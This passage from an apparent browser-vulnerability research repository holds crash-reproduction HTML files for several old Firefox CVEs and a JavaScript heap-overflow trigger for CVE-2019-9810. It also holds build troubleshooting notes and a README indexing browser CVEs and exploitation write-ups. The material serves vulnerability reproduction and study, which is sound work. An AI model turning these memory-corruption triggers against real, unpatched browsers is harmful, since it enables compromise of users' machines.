23 | 	o1.resizeTo(57,100);
24 | 	o5.removeChild(o6);
25 | 	o5.appendChild(o6);
26 | 	o15.select();
27 | }
28 | function fun2() {
29 | 	window.top.document.documentElement.appendChild(o15);
30 | 	FuzzingFunctions.garbageCollect();
31 | 	FuzzingFunctions.cycleCollect();
32 | 	FuzzingFunctions.garbageCollect();
33 | 	FuzzingFunctions.cycleCollect();
34 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
35 | }
36 | </script>
37 | <body onload="start()"></body>
38 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5098/data.html:
--------------------------------------------------------------------------------
1 | <div><div><div>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5099/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function spin () {
 3 |     var x=new XMLHttpRequest();
 4 |     x.open("POST","https://mozilla.org",false);
 5 |     try{x.send("X");}catch(e){}
 6 | }
 7 | function start () {	
 8 | 	o1=window.open('data.html','popup54','height=1');
 9 | 	window.top.setTimeout(fun0, 400);
10 | }
11 | function fun0() {
12 | 	o1.onresize=fun1;
13 | 	o1.resizeTo(10,-40961);
14 | 	o1.resizeBy(1,-16);
15 | }
16 | var x=0;
17 | function fun1() {
18 | 	if(x++) return;
19 | 	o1.close();
20 | 	for(var x=0; x<10; x++) spin();
21 | 	FuzzingFunctions.garbageCollect();
22 | 	FuzzingFunctions.cycleCollect();
23 | 	FuzzingFunctions.garbageCollect();
24 | 	FuzzingFunctions.cycleCollect();
25 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
26 | 	window.setTimeout("location.reload()",100);
27 | }
28 | </script>
29 | <body onload="start()"></body>
30 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5099/data.html:
--------------------------------------------------------------------------------
1 | <div>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5101/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o1481=new DOMParser();
 4 | 	o1506=o1481.parseFromString(undefined,'image/svg+xml');
 5 | 	o1621=document.createElement('style');
 6 | 	o1622=document.createTextNode('.class1');
 7 | 	o1621.appendChild(o1622);
 8 | 	o1807=document.createElement('shadow');
 9 | 	document.replaceChild(o1506.documentElement,document.documentElement);
10 | 	document.documentElement.appendChild(o1621);
11 | 	o2064=document.createElementNS('http://www.w3.org/1999/xhtml','style');
12 | 	o2065=document.createTextNode('{"a"""}:root{ direction: rtl}\n*{ display: unset}:first-letter{ -moz-border-start: inherit; float: inherit; border-inline-start-style: dashed}:first-line{}\n*{ -moz-border-start-style: initial; float: right; -moz-column-width: 51mm;0');
13 | 	o2064.appendChild(o2065);
14 | 	o1807.appendChild(o2064);
15 | 	document.documentElement.appendChild(o1807);
16 |     document.documentElement['getBoxQuads'](undefined);
17 | 	o1622.after('undefined');
18 | }
19 | </script>
20 | <body onload="start()"></script>
21 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5103/crash.html:
--------------------------------------------------------------------------------
 1 | <script>	
 2 | function spin () {
 3 |     var x=new XMLHttpRequest();
 4 |     x.open("POST","https://mozilla.org",false);
 5 |     try{x.send("X");}catch(e){}
 6 | }
 7 | function start() {
 8 |     setTimeout(fun0, 500);
 9 | }
10 | function fun0() {
11 | 	o67=document.documentElement.onmouseout=fun1;
12 | 	o123=window.open('div.html','p','');
13 | }
14 | function fun1() {
15 | 	o123.close();
16 | 	spin();
17 | 	FuzzingFunctions.garbageCollect();
18 | 	FuzzingFunctions.cycleCollect();
19 | 	FuzzingFunctions.garbageCollect();
20 | 	FuzzingFunctions.cycleCollect();
21 |     // fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
22 | }
23 | </script>
24 | <body onload="start()"></body>
25 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5128/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o15=document.createElement('input');
 4 | 	o15.setRangeText(undefined+"");
 5 | 	document.documentElement.onselect=fun0;
 6 | 	document.documentElement.onselectstart=fun1;
 7 | 	document.documentElement.appendChild(o15);
 8 | 	window.setTimeout("tmp()",100);
 9 | 	window.setTimeout("location.reload()", 400);
10 | }
11 | function tmp() {
12 | 	o15.select();
13 | }
14 | function fun0() {
15 | 	o15.setSelectionRange(1,-13);
16 | 	fuzzPriv.trustedKeyEvent(document.documentElement,'press',false,false,true,false,37,0);
17 | }
18 | function fun1() {
19 | 	o212=o15.cloneNode(false);
20 | 	o212.type='number';
21 | 	o15.type='hidden';
22 | }
23 | </script>
24 | <body onload="start()"></body>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5154/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/CVE-2018-5154/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5154/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o7=document.createElement('div');
 4 | 	o7.innerHTML='<style>@keyframes key7{ from{ transform: rotate(-536870911deg)}}\n*{ animation-name: key7; animation-duration: 0.001s';
 5 | 	o17=document.createElement('div');
 6 | 	o17.innerHTML='<svg><style>@font-face{}\n*{ outline-style: dotted</style><style>@font-face{ font-family: font3; src: url(';
 7 | 	o18=o17.firstChild.getElementsByTagName('*');
 8 | 	o20=o18[0];
 9 | 	o23=o18[1];
10 | 	o114=document.createElement('iframe');
11 | 	o114.src='test.svg';
12 | 	o114.addEventListener('load', fun0,false);
13 | 	document.body.appendChild(o114);
14 | }
15 | function fun0() {
16 | 	o117=o114.contentDocument;
17 | 	document.replaceChild(o117.documentElement,document.documentElement);
18 | 	o124=document.createElement('iframe');
19 | 	document.documentElement.appendChild(o124);
20 | 	o145=document.createElement('div');
21 | 	o145.innerHTML='<svg><set attributeName="text-decoration">';
22 | 	document.documentElement.appendChild(o20);
23 | 	document.documentElement.appendChild(o23);
24 | 	document.documentElement.appendChild(o7);
25 | 	o124.src='x';
26 | 	document.documentElement.appendChild(o145);
27 | 	o264=document.createElement('style');
28 | 	o265=document.createTextNode('*{ float: left');
29 | 	o264.appendChild(o265);
30 | 	o23.appendChild(o264);
31 | 	setTimeout("location.reload()",40);
32 | }
33 | </script>
34 | <body onload="start()"></body>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5154/test.svg:
--------------------------------------------------------------------------------
 1 | <svg id="id8" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 1000 300">
 2 | 	<style id="id9">
 3 | 		text {
 4 | 			text-transform: uppercase;
 5 | 		}
 6 | 	</style>
 7 | 	<defs>
 8 | 		<path id="id0" d="M 100 200 C 200 100 300 0 400 100 C 500 200 600 300 700 200 C 800 100 900 100 900 100 " />
 9 | 		<symbol>
10 | 			<rect x="225" y="135" width="50" height="230" id="id1"/>
11 | 		</symbol>
12 | 	</defs>
13 | 	<text font-family="Verdana" font-size="42.5" rotate="10 20 30 40 50 60" id="id7">
14 | 		abcdef
15 | 		<textPath xlink:href="#id0">
16 | 		Bla bla bla bla bla 
17 | 		</textPath>
18 | 		x x x
19 | 	</text>
20 | </svg>
21 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2019-9810/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/CVE-2019-9810/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2019-9810/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2019-9810 exploitation
 2 | 
 3 | Firefox version: 63.0.3
 4 | 
 5 | Keyword: IonMonkey, Heap Overflow
 6 | 
 7 | Description: Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow
 8 | 
 9 | overflow.js gives a heap overflow of an array (victim)
10 | 
11 | Reference
12 | 
13 | [1] https://www.exploit-db.com/exploits/46605
14 | 
15 | [2] https://github.com/0vercl0k/CVE-2019-9810
16 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2019-9810/overflow.js:
--------------------------------------------------------------------------------
 1 | let size = 0x100;
 2 | 
 3 | garr = [];
 4 | j = 0;
 5 | function gc(){
 6 | 	var tmp = [];
 7 | 	for(let i = 0;i < 0x20000;i++){
 8 | 		tmp[i] = new Uint32Array(size * 2);
 9 | 		for(let j = 0;j < (size*2);j+=2){
10 | 			tmp[i][j] = 0x12345678;
11 | 			tmp[i][j+1] = 0xfffe0123;
12 | 		}
13 | 	}
14 | 	garr[j++] = tmp;
15 | }
16 | 
17 | let arr = [{},0x49505049];
18 | 
19 | let obj = {};
20 | 
21 | obj[Symbol.species] = function(){
22 | 	console.log("inside obj");
23 | 	victim.length = 0x20; // length of victim should be 0x20
24 | 	for (let k = 0; k<0x20; k++){
25 | 		victim[k] = 0x44454544;
26 | 	}
27 | 	console.log(victim.length);
28 | 	for(let i = 0;i < 0x2000;i++){
29 | 		gvictim[i].length = 0x0;
30 | 		gvictim[i] = null;
31 | 	}
32 | 	gc();
33 | 	return [0x45464645];
34 | }
35 | 
36 | let gvictim = [];
37 | 
38 | for(let i = 0;i < 0x1000;i++){
39 | 	gvictim[i] = [1.1,2.2];
40 | 	gvictim[i].length = size;
41 | 	gvictim[i].fill(3.3);
42 | }
43 | 
44 | let victim = [0x46474746,0x47484847];
45 | victim.length = size;
46 | victim.fill(0x48494948);
47 | 
48 | for(let i = 0x1000;i < 0x2000;i++){
49 | 	gvictim[i] = [1.1,2.2];
50 | 	gvictim[i].length = size;
51 | 	gvictim[i].fill(3.3);
52 | }
53 | 
54 | function fake(arg){
55 | }
56 | for(let i = 0;i < size;i++){
57 | 	fake["x"+i.toString()] = 2.2;
58 | }
59 | 
60 | function jit(){
61 | 	victim[1] = 0x45464645;
62 | 	arr.slice();
63 | 	// lengt of victim was changed to 0x20
64 | 	// but bound check ommited
65 | 	return victim[0x21]; // overflow
66 | }
67 | 
68 | flag = 0;
69 | 
70 | 
71 | for(let i = 0;i < 0x10000;i++){
72 | 	xx = jit();
73 | }
74 | 
75 | Math.cos(1);
76 | console.log("pwn");
77 | arr.constructor = obj;
78 | Array.isArray(victim);
79 | res = jit();
80 | console.log(res)
81 | Math.cos(1);


--------------------------------------------------------------------------------
/Firefox/troubleshooting.md:
--------------------------------------------------------------------------------
  1 | # Troubleshooting
  2 | 
  3 | :hammer_and_pick::hammer_and_pick::hammer_and_pick::hammer_and_pick::hammer_and_pick:
  4 | 
  5 | I have run into many errors especially when trying to build older versions of Firefox (it was painful). Below are solutions I found.
  6 | 
  7 | 
  8 | 1. **Could not find gconf-2.0**
  9 | ```
 10 |   sudo apt-get install gconf-2.0
 11 |   sudo apt-get install -y libgconf2-dev
 12 | ```
 13 | 
 14 | ***
 15 | 
 16 | 2. **configure error with sed 4.3: sed: character class syntax is [[:space:]], not [:space:]**
 17 | 
 18 |   - open build/autoconf/icu.m4
 19 |   
 20 |   - modify manually according to https://bugzilla.mozilla.org/attachment.cgi?id=8825307&action=diff
 21 | 
 22 | ***
 23 | 
 24 | 3. **anything with rustc/cargo version:**
 25 | 
 26 |   It is likely because we are using newer version of rustc now and we need to downgrade it.
 27 |   
 28 |   - Find rustc version used at the time of the older version in [Firefox's Rust Update policy](https://wiki.mozilla.org/Rust_Update_Policy_for_Firefox)
 29 | 
 30 |   **Either:**
 31 |   
 32 |   - run ```$ ~/.cargo/bin/rustup self uninstall```
 33 |   
 34 |   - install:  
 35 |     ```
 36 |       $ curl https://sh.rustup.rs -sSf | sh
 37 |        Choose:
 38 |          2) Custom Installation
 39 |             default host triple <enter>
 40 |             default toolchain  1.22.1
 41 |             Modify PATH variable? (y/n)  n
 42 |        Then Choose:
 43 |          1) Proceed with installation (default)
 44 |     ```
 45 |     
 46 |   **or** 
 47 |   - install rustup and
 48 | 
 49 |   - ```rustup default <version>```
 50 | 
 51 |     For Firefox 57.0, I had to downgrade rustc to 1.19.0.
 52 |     
 53 |     For Firefox 63.0.3, I had to downgrade rustc to 1.28.0.
 54 | 
 55 | ***
 56 |     
 57 | 4. **ASAN build reports gcc compilation error:**
 58 | 
 59 |   ```error: inlining failed in call to always_inline ‘memcpy’: function attribute mismatch \__NTH (memcpy (void *\__restrict \__dest, const void *\__restrict \__src,```
 60 | 
 61 |   See https://bugzilla.mozilla.org/show_bug.cgi?id=1422254
 62 |   
 63 |   Basically add `-U_FORTIFY_SOURCE` to CFLAGS and CXXFLAGS in mozconfig
 64 |   
 65 | ***
 66 | 
 67 | 5. **Compiler error: undefined reference to dlsym**
 68 | 
 69 |   see https://askubuntu.com/questions/454443/how-do-i-deal-with-undefined-reference-to-dlopen-errors-while-compiling-and-us
 70 |   
 71 |   add `-Wl,--no-as-needed -ldl` to LDFLAGS in mozconfig
 72 |   
 73 | ***
 74 | 
 75 | 6. During a build with option ---enable-fuzzing, I got **gtest error**
 76 |   
 77 |    ```Firefox fatal error: gtest/gtest.h: No such file or directory```
 78 |    
 79 |    I fixed this by adding option --enable-tests
 80 |  
 81 | ***
 82 |  
 83 | 7. During a build with option --enable-fuzzing, I got **error in TestCodeGenBinding**
 84 |   
 85 |    ```dom/bindings/TestCodeGenBinding.cpp:34165:9: error: 'class mozilla::dom::TestInterface' has no member named 'PassUnion2'```
 86 |    
 87 |    https://bugzilla.mozilla.org/show_bug.cgi?id=1293516 mentions this error.
 88 |    
 89 |    I fixed it with running ```./mach clobber``` and rebuild.
 90 | 
 91 | *** 
 92 |  
 93 | 8. **Llvm-config: checking for llvm-config... not found**
 94 | 
 95 |   install llvm-config, check if it exists in /usr/bin/
 96 |   Add to mozconfig a line: ```export LLVM_CONFIG=“/usr/bin/llvm-config”```
 97 | 
 98 | ***
 99 | 
100 | 9. **clang**
101 | 
102 |   Sudo apt install clang
103 | 
104 | ***
105 | 
106 | 10. **nodejs version not new enough**
107 | 
108 |   uninstall nodejs: sudo apt remove nodejs
109 |   install nodejs: 
110 |   
111 |   ```https://deb.nodesource.com/setup_8.x | sudo -E bash -```
112 |   
113 |   ```sudo apt-get install -y nodejs```
114 | 
115 | ***
116 | 
117 | 11. Firefox 56 and 59 crashes at startup with:
118 | 
119 | > Assertion failure: false, at /home/user/firefox/security/sandbox/linux/SandboxInfo.cpp:174
120 | 
121 | [Bug report](https://bugzilla.mozilla.org/show_bug.cgi?id=1430756)
122 | 
123 | Change according to the [fix](https://hg.mozilla.org/mozilla-central/rev/22ce3b9ca9af)
124 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # web-browser-vulnerabilities
  2 | 
  3 | Steps for building old versions of Firefox: [:link:](Firefox/)
  4 | 
  5 | Steps for building old versions of Chrome: [:link:](Chrome/)
  6 | 
  7 | 
  8 | ## Firefox vulnerabilities
  9 | This is a list of vulnerabilities that is reproducible in old versions of Firefox :point_down:
 10 | 
 11 | | CVE ID  | Version | Type | Exploited? | Link|
 12 | | ---| --- | ---| ---| --- |
 13 | | CVE-2017-7784  | 56.0  | UAF | |[:link:](Firefox/CVE-2017-7784)|
 14 | | CVE-2017-7828  | 56.0  | UAF | |[:link:](Firefox/CVE-2017-7828)|
 15 | | CVE-2018-5093  | 57.0  | heap buffer overflow | |[:link:](Firefox/CVE-2018-5093)|
 16 | | CVE-2018-5094  | 57.0  | heap buffer overflow | | [:link:](Firefox/CVE-2018-5094)|
 17 | | CVE-2018-5097  | 56.0/57.0  | UAF | | [:link:](Firefox/CVE-2018-5097)|
 18 | | CVE-2018-5100  | 56.0/57.0  | UAF | | [:link:](Firefox/CVE-2018-5100)|
 19 | | CVE-2018-5102 | 56.0/57.0  | UAF | | [:link:](Firefox/CVE-2018-5102)|
 20 | | CVE-2018-5104  | 56.0/57.0  | UAF | | [:link:](Firefox/CVE-2018-5104)|
 21 | | CVE-2018-5127  | 57.0  | heap buffer overflow | |[:link:](Firefox/CVE-2018-5127)|
 22 | | CVE-2018-5129  | 57.0  | OOB | |[:link:](Firefox/CVE-2018-5129)|
 23 | | CVE-2018-12386  | < 61.0  | type confusion | Yes |[:link:](Firefox/CVE-2018-12386)|
 24 | | CVE-2018-12387  | < 61.0 | info leak | Yes |[:link:](Firefox/CVE-2018-12387)|
 25 | | CVE-2018-18492  | 62.0/63.0 | UAF | |[:link:](Firefox/CVE-2018-18492)|
 26 | | CVE-2019-9791 | < 66.0 | type confusion | Yes |[:link:](Firefox/CVE-2019-9791)|
 27 | | CVE-2019-9813 | < 66.0.1 | type confusion | |[:link:](Firefox/CVE-2019-9813)|
 28 | | CVE-2019-11707 | < 66.0.3 | type confusion | Yes |[:link:](Firefox/CVE-2019-11707)|
 29 | 
 30 | Others to be verified: :point_right: [:link:](Firefox/others/)
 31 | 
 32 | 
 33 | ## Chrome vulnerabilities
 34 | Vulnerabilities in Chrome :point_down:
 35 | 
 36 | | CVE ID  | Version | Type | Exploited? | Link|
 37 | | ---| --- | ---| ---| --- |
 38 | | CVE-2018-6060 | 62.0.3202.75 | UAF | | [:link:](Chrome/CVE-2018-6060)
 39 | | CVE-2018-6123 | 68.0.3404.0 | UAF | | [:link:](Chrome/CVE-2018-6123)
 40 | | CVE-2019-5786 | 72.0.3626.119 | UAF | | [:link:](Chrome/CVE-2019-5786)
 41 | | CVE-2019-5808 | 74.0.3728.0 | UAF | | [:link:](Chrome/CVE-2019-5808)
 42 | 
 43 | 
 44 | ## Useful links:
 45 | 
 46 | ## General:
 47 | 
 48 | - [Good place for searching CVEs](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=firefox)
 49 | 
 50 | - [List of Javascript Engine vulnerabilities](https://github.com/tunz/js-vuln-db)
 51 | 
 52 | - [Exploitation DB](https://www.exploit-db.com/)
 53 | 
 54 | - [Awesome-browser-exploit](https://github.com/Escapingbug/awesome-browser-exploit)
 55 | 
 56 | ## Firefox:
 57 | 
 58 | ### Basic
 59 | 
 60 | - [Build configuration](https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/Build_Instructions/Configuring_Build_Options)
 61 | 
 62 | - [Build with Address Sanitizer](https://firefox-source-docs.mozilla.org/tools/sanitizer/asan.html)
 63 | 
 64 | - [Hacking tips](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey/Hacking_Tips)
 65 | 
 66 | - [Security Advisories (for finding vulnerabilities)](https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox/)
 67 | 
 68 | - [Online code browse](https://searchfox.org/mozilla-beta/source)
 69 | 
 70 | ### Tutorials
 71 | 
 72 | - [Shadow over Firefox](http://www.phrack.org/issues/69/14.html)
 73 | 
 74 | - [Jemalloc](https://medium.com/iskakaushik/eli5-jemalloc-e9bd412abd70)
 75 | 
 76 | - [Jemalloc Exploitation](http://www.phrack.org/issues/68/10.html#article)
 77 | 
 78 | - [Introduction to Spidermonkey exploitation](https://doar-e.github.io/blog/2018/11/19/introduction-to-spidermonkey-exploitation/)
 79 | 
 80 | - [Heap manipulation](https://www.usenix.org/legacy/event/woot08/tech/full_papers/daniel/daniel_html/index.html)
 81 | 
 82 | - [Spraying the Heap (Chapter 2: Use-After-Free) – Finding a needle in a Haystack](https://www.fuzzysecurity.com/tutorials/expDev/11.html)
 83 | 
 84 | - [Heap spray](https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/)
 85 | 
 86 | ### Exploitation writeups
 87 | 
 88 | - [CVE-2012-0469: UAF](http://web.archive.org/web/20150121031623/http://www.vupen.com/blog/20120625.Advanced_Exploitation_of_Mozilla_Firefox_UaF_CVE-2012-0469.php)
 89 | 
 90 | - [CVE-2016-9066: cross-map overflow](https://saelo.github.io/posts/firefox-script-loader-overflow.html)
 91 | 
 92 | - [CVE-2016-9079: UAF](https://dangokyo.me/2018/07/29/analysis-on-cve-2016-9079/)
 93 | 
 94 | - [CVE-2016-1960: UAF exploitation](https://www.exploit-db.com/exploits/42484)
 95 | 
 96 | - [CVE-2017-5375: JIT spray RCE](https://www.exploit-db.com/exploits/44293)
 97 | 
 98 | - [CVE-2017-5375: JIT spray writeup](https://rh0dev.github.io/blog/2017/the-return-of-the-jit/)
 99 | 
100 | - [CVE-2018-18500: UAF](https://news.sophos.com/en-us/2019/04/18/protected-cve-2018-18500-heap-write-after-free-in-firefox-analysis-and-exploitation/)
101 | 
102 | - [CVE-2019-9791: Type confusion](https://bugs.chromium.org/p/project-zero/issues/detail?id=1791)
103 | 
104 | - [CVE-2019-9810, IonMonkey](https://doar-e.github.io/blog/2019/06/17/a-journey-into-ionmonkey-root-causing-cve-2019-9810/)
105 | 
106 | - [CVE-2019-9813: Type confusion](https://www.exploit-db.com/exploits/46646)
107 | 
108 | - [CVE-2019-11707: Type confusion](https://blog.bi0s.in/2019/08/18/Pwn/Browser-Exploitation/cve-2019-11707-writeup/)
109 | 
110 | 
111 | ## Chrome
112 | 
113 | ### General
114 | 
115 | - [Build configuration](https://gitlab.com/noencoding/OS-X-Chromium-with-proprietary-codecs/-/wikis/List-of-all-gn-arguments-for-Chromium-build)
116 | 
117 | - [List of command line options](https://peter.sh/experiments/chromium-command-line-switches/)
118 | 
119 | - [How Blink works](https://docs.google.com/document/d/1aitSOucL0VHZa9Z2vbRJSyAIsAz24kX8LFByQ5xQnUg/edit?pli=1#)
120 | 
121 | - [Allocator](https://chromium.googlesource.com/chromium/src/base/+show/master/allocator/README.md)
122 | 
123 | - [Debugging in Linux](https://chromium.googlesource.com/chromium/src/+/81c0fc6d4/docs/linux_debugging.md)
124 | 
125 | ### Exploitation writeup
126 | 
127 | - [CVE-2019-5786](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/)
128 | 
129 | Happy Hacking :trollface:


--------------------------------------------------------------------------------